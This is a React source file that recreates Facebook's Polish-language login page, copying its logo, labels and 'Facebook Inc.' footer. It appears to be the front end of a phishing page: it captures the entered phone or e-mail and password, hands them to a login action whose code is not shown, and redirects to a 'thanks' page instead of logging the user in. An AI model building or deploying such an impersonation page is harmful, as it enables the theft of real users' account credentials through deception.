import React from 'react';
import {
    Navbar,
    LogoContainer,
    LogoImage,
    Container,
    FormContainer,
    RzeczyInput,
    LogButton,
    AlboContainer,
    Line,
    Albo,
    CreateAcoountButton,
    ForgotPassword,
    TableContainer,
    TableLanguage,
    TableLanguageRow,
    TableLanguageColumn,
    FacebookFooter
} from './styled/FacebookStyled';
import logo from '../images/logo.png';
import plus from '../images/plus.png';
import { connect } from 'react-redux';
import { clickLogInButton, getLogin, getPassword } from '../actions/action';
import { Link } from 'react-router-dom';

const Facebook = ({clickLogInButton, getLogin, getPassword, login, password}) => {
    return (
        <div>
            <Navbar>
                <LogoContainer>
                    <LogoImage src={logo} />
                </LogoContainer>
            </Navbar>
            <Container>
                <FormContainer>
                    <RzeczyInput onChange = {e => getLogin(e.target.value)} placeholder="Numer telefonu lub adres e-mail" />
                    <RzeczyInput onChange = {e => getPassword(e.target.value)} type="password" placeholder="Hasło" />
                    <Link style = {{width: "100%"}} to="/thanks">
                        <LogButton onClick={() => clickLogInButton(login, password)}>Zaloguj się</LogButton>
                    </Link>
                    <AlboContainer>
                        <Line />
                        <Albo>lub</Albo>
                        <Line />
                    </AlboContainer>
                    <CreateAcoountButton>Utwórz nowe konto</CreateAcoountButton>
                    <ForgotPassword href="#">Nie pamiętasz hasła?</ForgotPassword>
                </FormContainer>
                <TableContainer>
                    <TableLanguage>
                        <tbody>
                            <TableLanguageRow>
                                <TableLanguageColumn style={{ color: "#90949c" }}>Polski</TableLanguageColumn>
                                <TableLanguageColumn>English (US)</TableLanguageColumn>
                            </TableLanguageRow>
                            <TableLanguageRow>
                                <TableLanguageColumn>ślōnskŏ gŏdka</TableLanguageColumn>
                                <TableLanguageColumn>Русский</TableLanguageColumn>
                            </TableLanguageRow>
                            <TableLanguageRow>
                                <TableLanguageColumn>Deutsch</TableLanguageColumn>
                                <TableLanguageColumn>Español</TableLanguageColumn>
                            </TableLanguageRow>
                            <TableLanguageRow>
                                <TableLanguageColumn>Português (Brasil)</TableLanguageColumn>
                                <TableLanguageColumn><img style={{ width: "20px", height: "20px" }} src={plus} alt="" /></TableLanguageColumn>
                            </TableLanguageRow>
                        </tbody>
                    </TableLanguage>
                </TableContainer>
                <FacebookFooter>
                    Facebook Inc.
                </FacebookFooter>
            </Container>
        </div>
    )
}

const mapStateToProps = (state) => {
    return {
        login: state.messageReducer.login,
        password: state.messageReducer.password
    }
}

const mapDispatchToProps = {
    clickLogInButton,
    getLogin,
    getPassword
}

export default connect(mapStateToProps, mapDispatchToProps)(Facebook);